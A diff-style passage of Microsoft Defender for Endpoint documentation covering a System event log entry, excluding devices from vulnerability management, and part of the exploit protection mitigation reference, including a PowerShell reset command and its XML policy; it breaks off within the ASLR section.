-Microsoft Defender for Endpoint events also appear in the System event log.
-
-To open the System event log:
-
-1. Select **Start** on the Windows menu, type **Event Viewer**, and press **Enter** to open the Event Viewer.
-2. In the log list, under **Log Summary**, scroll until you see **System**. Double-click the item to open the log.
-
-You can use this table for more information on the Defender for Endpoint events in the System events log and to determine further troubleshooting steps.
-
- |Event ID|Message|Description|Action|
- |||||
- |1|The backing-file for the real-time session "SenseNdrPktmon" has reached its maximum size. As a result, new events will not be logged to this session until space becomes available.|This real-time session, between Pktmon - the built-in Windows service that captures network traffic, and our agent (SenseNDR) - that analyzes packets asynchronously, is configured to limited to prevent potential performance issues. As a result, this alert may appear if too many packets are intercepted in a short time period, causing some packets to be skipped. This alert is more common with high network traffic.|Normal operating notification; no action required.|
-
-## See also
--- [Onboard Windows client devices](configure-endpoints.md)-- [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md)-- [Troubleshoot Microsoft Defender for Endpoint](troubleshoot-onboarding.md)-- [Client analyzer overview](overview-client-analyzer.md)-- [Download and run the client analyzer](download-client-analyzer.md)-- [Understand the analyzer HTML report](analyzer-report.md)
security Exclude Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exclude-devices.md
- Title: Exclude devices in Microsoft Defender for Endpoint
-description: Exclude devices from the device inventory list
------- m365-security-- tier2- Previously updated : 02/16/2022--
-# Exclude devices
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-respondmachine-abovefoldlink)
-
-## Exclude devices from vulnerability management
-
-Excluding devices that are inactive, duplicate, or out of scope allows you to focus on discovering and prioritizing the risks on your active devices. This action can also help reflect a more accurate vulnerability management exposure score, as the excluded devices won't be visible in your vulnerability management reports.
-
-Once devices are excluded, you won't be able to view updated or relevant information about vulnerabilities and installed software on these devices. It affects all vulnerability management pages, reports, and related tables in advanced hunting.
-
-Even though the device exclusion feature removes the device data from vulnerability management pages and reports, the devices remain connected to the network and can still be a risk to the organization. You'll be able to cancel the device exclusion at any time.
-
-## How to exclude a device
-
-You can choose to exclude a single device or multiple devices at the same time.
-
-### Exclude a single device
-
-1. Go to the **Device inventory** page and select the device to exclude.
-2. Select **Exclude** from the action bar on the device inventory page or from the actions menu in the device flyout.
-
- ![Image of exclude device menu option.](media/exclude-devices-menu.png)
-
-3. Select a justification:
-
- - Inactive device
- - Duplicate device
- - Device doesn't exist
- - Out of scope
- - Other
-
-4. Type a note and select **Exclude device**.
-
-![Image of exclude device.](media/exclude-device.png)
-
-You can also exclude a device from its device page.
-
-> [!NOTE]
-> Excluding active devices is not recommended, since it is especially risky to not have visibility into their vulnerability info. If a device is active and you try to exclude it, you'll get a warning message and a confirmation pop-up asking if you are sure you want to exclude an active device.
-
-It can take up to 10 hours for a device to be fully excluded from vulnerability management views and data.
-
-Excluded devices are still visible in the Device inventory list. You can manage your view of excluded devices by:
--- Adding the **Exclusion state** column to the device inventory view.-- Using the **Exclusion state** filter to view the relevant list of devices.-
-![Image of exclusion state.](media/exclusion-state.png)
-
-### Bulk device exclusion
-
-You can also choose to exclude multiple devices at the same time:
-
-1. Go to the **Device inventory** page and select the devices to exclude.
-
-2. From the actions bar, select **Exclude**.
-
-3. Choose a justification and select **Exclude device**.
-
-If you select multiple devices in the device list with different exclusion statuses, the exclude selected devices flyout will provide you details on how many of the selected devices are already excluded. You can exclude the devices again, but the justification and notes will be overridden.
-
-![Image of bulk exclude](media/exclude-device-bulk.png)
-
-Once a device is excluded, if you go to the device page of an excluded device, you won't be able to see data for discovered vulnerabilities, software inventory or security recommendations. The data also won't show up in vulnerability management pages, related advanced hunting tables and the vulnerable devices report.
-
-## Stop excluding a device
-
-You'll be able to stop excluding a device at any time. Once devices are no longer excluded, their vulnerability data will be visible in vulnerability management pages, reports, and in advanced hunting. It may take up to 8 hours for the changes to take effect.
-
-1. Go to the Device inventory, select the excluded device to open the flyout, and then select **Exclusion details**
-2. Select **Stop exclusion**
-
-![Image of exclusion details](media/exclusion-details.png)
-
-## See also
--- [Device inventory](machines-view-overview.md)
security Exploit Protection Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exploit-protection-reference.md
- Title: Exploit protection reference
-description: Details on how the exploit protection feature works in Windows
----------- m365-security-- tier3-- mde-asr Previously updated : 11/07/2023--
-# Exploit protection reference
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-Exploit protection provides advanced protections for applications that enterprise admins and IT pros can apply after a developer has compiled and distributed software.
-
-This article helps you understand how exploit protection works, both at the policy level and at the individual mitigation level, to help you successfully build and apply exploit protection policies.
-
-## How mitigations are applied
-
-Exploit protection mitigations are applied per application.
-
-Mitigations are configured via a registry entry for each program that you configure protections for. These settings are stored in the **MitigationOptions** registry entry for each program (`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*ImageFileName*\MitigationOptions`). They take effect when you restart the program, and remain effective until you change them and restart the program again.
-
-> [!IMPORTANT]
-> Image file execution options only allows you to specify a file name or path, and not a version number, architecture, or any other differentiator. Be careful to target mitigations to apps which have unique names or paths, applying them only on devices where you have tested that version and that architecture of the application.
-
-If you configure exploit protection mitigations using an XML configuration file by using PowerShell, Group Policy, or MDM, when processing this XML configuration file, individual registry settings are configured for you.
-
-When the policy distributing the XML file is no longer enforced, settings deployed by this XML configuration file won't be automatically removed. To remove Exploit Protection settings, export the XML configuration from a clean Windows 10 or Windows 11 device, and deploy this new XML file. Alternately, Microsoft provides an XML file as part of the Windows Security Baselines for resetting Exploit Protection settings.
-
-To reset exploit protection settings using PowerShell, use the following command:
-
-```powershell
-Set-ProcessMitigation -PolicyFilePath EP-reset.xml
-```
-Following is the EP-reset.xml distributed with the Windows Security Baselines:
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<MitigationPolicy>
- <AppConfig Executable="ONEDRIVE.EXE">
- <DEP OverrideDEP="false" />
- <ASLR OverrideRelocateImages="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- <ImageLoad OverrideBlockRemoteImages="false" />
- </AppConfig>
- <AppConfig Executable="firefox.exe">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- </AppConfig>
- <AppConfig Executable="fltldr.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- <ImageLoad OverrideBlockRemoteImages="false" />
- <ChildProcess OverrideChildProcess="false" />
- </AppConfig>
- <AppConfig Executable="GROOVE.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- <ImageLoad OverrideBlockRemoteImages="false" />
- <ChildProcess OverrideChildProcess="false" />
- </AppConfig>
- <AppConfig Executable="Acrobat.exe">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="AcroRd32.exe">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="chrome.exe">
- <DEP OverrideDEP="false" />
- </AppConfig>
- <AppConfig Executable="EXCEL.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="iexplore.exe">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="INFOPATH.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="java.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="javaw.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="javaws.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="LYNC.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="MSACCESS.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="MSPUB.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="OIS.EXE">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="OUTLOOK.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="plugin-container.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="POWERPNT.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="PPTVIEW.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="VISIO.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="VPREVIEW.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="WINWORD.EXE">
- <DEP OverrideDEP="false" />
- <ASLR ForceRelocateImages="true" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="wmplayer.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
- <AppConfig Executable="wordpad.exe">
- <DEP OverrideDEP="false" />
- <Payload OverrideEnableExportAddressFilter="false" OverrideEnableExportAddressFilterPlus="false" OverrideEnableImportAddressFilter="false" OverrideEnableRopStackPivot="false" OverrideEnableRopCallerCheck="false" OverrideEnableRopSimExec="false" />
- </AppConfig>
-</MitigationPolicy>
-```
-
-## Mitigation Reference
-
-The following sections detail the protections provided by each exploit protection mitigation, the compatibility considerations for the mitigation, and the configuration options available.
-
-## Arbitrary code guard
-
-### Description
-
-Arbitrary code guard helps protect against a malicious attacker loading the code of their choice into memory through a memory safety vulnerability and being able to execute that code.
-
-Arbitrary code guard protects an application from executing dynamically generated code (code that isn't loaded, for example, from the exe itself or a dll). Arbitrary code guard works by preventing memory from being marked as executable. When an application attempts to [allocate memory](/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc), we check the protection flags. (Memory can be allocated with read, write, and/or execute protection flags.) If the allocation attempts to include the [*execute*](/windows/win32/memory/memory-protection-constants) protection flag, then the memory allocation fails and returns an error code (STATUS_DYNAMIC_CODE_BLOCKED). Similarly, if an application attempts to [change the protection flags of memory](/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) that has already been allocated and includes the [*execute*](/windows/win32/memory/memory-protection-constants) protection flag, then the permission change fails and returns an error code (STATUS_DYNAMIC_CODE_BLOCKED).
-
-By preventing the *execute* flag from being set, the data execution prevention feature of Windows 10 and Windows 11 can then protect against the instruction pointer being set to that memory and running that code.
-
-### Compatibility considerations
-
-Arbitrary code guard prevents allocating any memory as executable, which presents a compatibility issue with approaches such as Just-in-Time (JIT) compilers. Most modern browsers, for example, compile JavaScript into native code in order to optimize performance. In order to support this mitigation, they'll need to be rearchitected to move the JIT compilation outside of the protected process. Other applications whose design dynamically generates code from scripts or other intermediate languages are similarly incompatible with this mitigation.
-
-### Configuration options
-
-**Allow thread opt-out** - You can configure the mitigation to allow an individual thread to opt-out of this protection. The developer must have written the application with awareness of this mitigation, and have called the [**SetThreadInformation**](/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadinformation) API with the *ThreadInformation* parameter set to **ThreadDynamicCodePolicy** in order to be allowed to execute dynamic code on this thread.
-
-**Audit only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Block low integrity images
-
-### Description
-
-Block low integrity images prevents the application from loading files that are untrusted, typically because they've been downloaded from the internet from a sandboxed browser.
-
-This mitigation blocks image loads if the image has an Access Control Entry (ACE) which grants access to Low IL processes and which doesn't have a trust label ACE. It's implemented by the memory manager, which blocks the file from being mapped into memory. If an application attempts to map a low integrity image, it triggers a STATUS_ACCESS_DENIED error. For details on how integrity levels work, see [Mandatory Integrity Control](/windows/win32/secauthz/mandatory-integrity-control).
-
-### Compatibility considerations
-
-Block low integrity images prevent the application from loading files that were downloaded from the internet. If your application workflow requires loading images that are downloaded, you'll want to ensure that they're downloaded from a higher-trust process, or are explicitly relabeled in order to apply this mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Block remote images
-
-### Description
-
-Blocking remote images helps to prevent the application from loading files that are hosted on a remote device, such as a UNC share. Blocking remote images helps protect against loading binaries into memory that are on an external device controlled by the attacker.
-
-This mitigation blocks image loads if the image is determined to be on a remote device. It's implemented by the memory manager, which blocks the file from being mapped into memory. If an application attempts to map a remote file, it triggers a STATUS_ACCESS_DENIED error.
-
-### Compatibility considerations
-
-Block remote images prevent the application from loading images from remote devices. If your application loads files or plug-ins from remote devices, then it will not be compatible with this mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Block untrusted fonts
-
-### Description
-
-Block untrusted fonts mitigates the risk of a flaw in font parsing leading to the attacker being able to run code on the device. Only fonts that are installed into the windows\fonts directory will be loaded for processing by GDI.
-
-This mitigation is implemented within GDI, which validates the location of the file. If the file isn't in the system fonts directory, the font won't be loaded for parsing and that call will fail.
-
-This mitigation is in addition to the built-in mitigation provided in Windows 10 1607 and later, and Windows 11, which moves font parsing out of the kernel and into a user-mode app container. Any exploit based on font parsing, as a result, happens in a sandboxed and isolated context, which reduces the risk significantly. For details on this mitigation, see the blog [Hardening Windows 10 with zero-day exploit mitigations](https://www.microsoft.com/security/blog/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/).
-
-### Compatibility considerations
-
-The most common use of fonts outside of the system fonts directory is with [web fonts](/typography/fonts/font-faq#web). Modern browsers, such as Microsoft Edge, use DirectWrite instead of GDI, and aren't impacted. However, legacy browsers, such as Internet Explorer 11 (and IE mode in the new Microsoft Edge) can be impacted, particularly with applications such as Office 365, which use font glyphs to display UI.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Code integrity guard
-
-### Description
-
-Code integrity guard ensures that all binaries loaded into a process are digitally signed by Microsoft. Code integrity guard includes [WHQL](/windows-hardware/drivers/install/whql-release-signature) (Windows Hardware Quality Labs) signatures, which allows WHQL-approved drivers to run within the process.
-
-This mitigation is implemented within the memory manager, which blocks the binary from being mapped into memory. If you attempt to load a binary that isn't signed by Microsoft, the memory manger returns the error STATUS_INVALID_IMAGE_HASH. By blocking at the memory manager level, this prevents both binaries loaded by the process and binaries injected into the process.
-
-### Compatibility considerations
-
-This mitigation specifically blocks any binary that isn't signed by Microsoft. As such, it is incompatible with most third-party software, unless that software is distributed by (and digitally signed by) the Microsoft Store, and the option to allow loading of images signed by the Microsoft Store is selected.
-
-### Configuration options
-
-**Also allow loading of images signed by Microsoft Store** - Applications that are distributed by the Microsoft Store are digitally signed by the Microsoft Store, and adding this configuration allows binaries that have gone through the store certification process to be loaded by the application.
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Control flow guard (CFG)
-
-### Description
-
-Control flow guard (CFG) mitigates the risk of attackers using memory corruption vulnerabilities by protecting indirect function calls. For example, an attacker may use a buffer overflow vulnerability to overwrite memory containing a function pointer, and replace that function pointer with a pointer to executable code of their choice (which may also have been injected into the program).
-
-This mitigation is provided by injecting another check at compile time. Before each indirect function call, another instructions are added which verify that the target is a valid call target before it's called. If the target isn't a valid call target, then the application is terminated. As such, only applications that are compiled with CFG support can benefit from this mitigation.
-
-The check for a valid target is provided by the Windows kernel. When executable files are loaded, the metadata for indirect call targets is extracted at load time and marked as valid call targets. Additionally, when memory is allocated and marked as executable (such as for generated code), these memory locations are also marked as valid call targets, to support mechanisms such as JIT compilation.
-
-### Compatibility considerations
-
-Since applications must be compiled to support CFG, they implicitly declare their compatibility with it. Most applications, therefore, should work with this mitigation enabled. Because these checks are compiled into the binary, the configuration you can apply is merely to disable checks within the Windows kernel. In other words, the mitigation is on by default, but you can configure the Windows kernel to always return "yes" if you later determine that there's a compatibility issue that the application developer didn't discover in their testing, which should be rare.
-
-### Configuration options
-
-**Use strict CFG** - In strict mode, all binaries loaded into the process must be compiled for Control Flow Guard (or have no executable code in them - such as resource dlls) in order to be loaded.
-
-> [!Note]
-> **Control flow guard** has no audit mode. Binaries are compiled with this mitigation enabled.
-
-## Data Execution Prevention (DEP)
-
-### Description
-
-Data execution prevention (DEP) prevents memory that wasn't explicitly allocated as executable from being executed. DEP helps protect against an attacker injecting malicious code into the process, such as through a buffer overflow, and then executing that code.
-
-If you attempt to set the instruction pointer to a memory address not marked as executable, the processor throws an exception (general-protection violation), causing the application to crash.
-
-### Compatibility considerations
-
-All x64, ARM, and ARM-64 executables have DEP enabled by default, and it can't be disabled. Since an application has never been executed without DEP, compatibility is assumed.
-
-All x86 (32-bit) binaries have DEP enabled by default, but DEP can be disabled per process. Some old legacy applications, typically applications developed prior to Windows XP SP2, might not be compatible with DEP. Such applications typically generate code dynamically (for example, JIT compiling) or link to older libraries (such as older versions of ATL) which dynamically generate code.
-
-### Configuration options
-
-**Enable ATL Thunk emulation** - This configuration option disables ATL Thunk emulation. ATL, the ActiveX Template Library, is designed to be as small and fast as possible. In order to reduce binary size, it would use a technique called *thunking*. Thunking is typically thought of for interacting between 32-bit and 16-bit applications, but there are no 16-bit components to ATL here. Rather, in order to optimize for binary size, ATL stores machine code in memory that isn't word-aligned (creating a smaller binary), and then invoke that code directly. ATL components compiled with Visual Studio 7.1 or earlier (Visual Studio 2003) don't allocate this memory as executable - thunk emulation resolves that compatibility issue. Applications that have a binary extension model (such as Internet Explorer 11) will often need to have ATL Thunk emulation enabled.
-
-## Disable extension points
-
-### Description
-
-This mitigation disables various extension points for an application, which might be used to establish persistence or elevate privileges of malicious content.
-
-This includes:
--- **AppInit DLLs** - Whenever a process starts, the system loads the specified DLL into to context of the newly started process before calling its entry point function. [Details on AppInit DLLs can be found here](/windows/win32/winmsg/about-window-classes#application-global-classes). With this mitigation applied, AppInit DLLs aren't loaded. Beginning with Windows 7, AppInit DLLs need to be digitally signed, [as described here](/windows/win32/win7appqual/appinit-dlls-in-windows-7-and-windows-server-2008-r2). Additionally, beginning with Windows 8, AppInit DLLs won't be loaded if SecureBoot is enabled, [as described here](/windows/win32/dlls/secure-boot-and-appinit-dlls).-- **Legacy IMEs** - An Input Method Editor (IME) allows a user to type text in a language that has more characters than can be represented on a keyboard. Third parties are able to create IMEs. A malicious IME might obtain credentials or other sensitive information from this input capture. Some IMEs, referred to as Legacy IMEs, only work on Windows Desktop apps, and not UWP apps. This mitigation also prevents this legacy IME from loading into the specified Windows Desktop app.-- **Windows Event Hooks** - An application can call the [SetWinEventHook API](/windows/win32/api/winuser/nf-winuser-setwineventhook) to register interest in an event taking place. A DLL is specified and can be injected into the process. This mitigation forces the hook to be posted to the registering process rather than running in-process through an injected DLL.-
-### Compatibility considerations
-
-Most of these extension points are relatively infrequently used, so compatibility impact is typically small, particularly at an individual application level. The one consideration is if users are using third-party Legacy IMEs that won't work with the protected application.
-
-### Configuration options
-
-There are no configuration options for this mitigation.
-
-> [!Note]
-> **Disable extension points** has no audit mode.
-
-## Disable Win32k system calls
-
-### Description
-
-Win32k.sys provides a broad attack surface for an attacker. As a kernel-mode component, it's frequently targeted as an escape vector for applications that are sandboxed. This mitigation prevents calls into win32k.sys by blocking a thread from converting itself into a GUI thread, which is then given access to invoke Win32k functions. A thread is non-GUI when created, but converted on first call to win32k.sys, or through an API call to [IsGuiThread](/windows/win32/api/winuser/nf-winuser-isguithread).
-
-### Compatibility considerations
-
-This mitigation is designed for processes that are dedicated non-UI processes. For example, many modern browsers use process isolation and incorporate non-UI processes. Any application that displays a GUI using a single process will be impacted by this mitigation.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Don't allow child processes
-
-### Description
-
-This mitigation prevents an application from creating new child applications. A common technique used by adversaries is to initiate a trusted process on the device with malicious input (a "living off the land" attack), which often requires launching another application on the device. If there are no legitimate reasons why an application would launch a child process, this mitigation mitigates that potential attack vector. The mitigation is applied by setting a property on the process token, which blocks creating a token for the child process with the error message STATUS_CHILD_PROCESS_BLOCKED.
-
-### Compatibility considerations
-
-If your application launches child applications for any reason, such as supporting hyperlinks that launch a browser or an external browser, or which launch other utilities on the computer, this functionality will be broken with this mitigation applied.
-
-### Configuration options
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Export address filtering
-
-### Description
-
-Export address filtering (EAF) mitigates the risk of malicious code looking at the export address table of all loaded modules to find modules that contain useful APIs for their attack. This is a common tactic used by shellcode. In order to mitigate the risk of such an attack, this mitigation protects three commonly attacked modules:
--- ntdll.dll-- kernelbase.dll-- kernel32.dll-
-The mitigation protects the memory page in the [export directory that points to the [export address table](/windows/win32/debug/pe-format#export-address-table). This memory page will have the [PAGE_GUARD](/windows/win32/memory/creating-guard-pages) protection applied to it. When someone tries to access this memory, it generates a STATUS_GUARD_PAGE_VIOLATION. The mitigation handles this exception, and if the accessing instruction doesn't pass validation, the process is terminated.
-
-### Compatibility considerations
-
-This mitigation is primarily an issue for applications such as debuggers, sandboxed applications, applications using DRM, or applications that implement anti-debugging technology.
-
-### Configuration options
-
-**Validate access for modules that are commonly abused by exploits** - This option, also known as EAF+, adds protections for other commonly attacked modules:
--- `mshtml.dll`-- `flash*.ocx`-- `jscript*.ocx`-- `vbscript.dll`-- `vgx.dll`-- `mozjs.dll`-- `xul.dll`-- `acrord32.dll`-- `acrofx32.dll`-- `acroform.api`-
-Additionally, by enabling EAF+, this mitigation adds the PAGE_GUARD protection to the page containing the "MZ" header, the first two bytes of the [DOS header in a PE file](/windows/win32/debug/pe-format#ms-dos-stub-image-only), which is another aspect of known memory content which shellcode can look for to identify modules potentially of interest in memory.
-
-**Audit Only** - You can enable this mitigation in audit mode in order to measure the potential compatibility impact on an application. Audit events can then be viewed either in the event viewer or using Advanced Hunting in [Microsoft Defender for Endpoint](/microsoft-365/security/defender/advanced-hunting-overview).
-
-## Force randomization for images (Mandatory ASLR)
-
-### Description
-
-Address Space Layout Randomization (ASLR) mitigates the risk of an attacker using their knowledge of the memory layout of the system in order to execute code that is already present in process memory and already marked as executable. This can mitigate the risk of an attacker using techniques such as return-to-libc attacks, where the adversary sets the context and then modifies the return address to execute existing code with context that suits the adversary's purpose.
-
-Mandatory ASLR forces a rebase of all DLLs within the process. A developer can enable ASLR using the [/DYNAMICBASE](/cpp/build/reference/dynamicbase-use-address-space-layout-randomization) linker option, and this mitigation has the same effect.
-
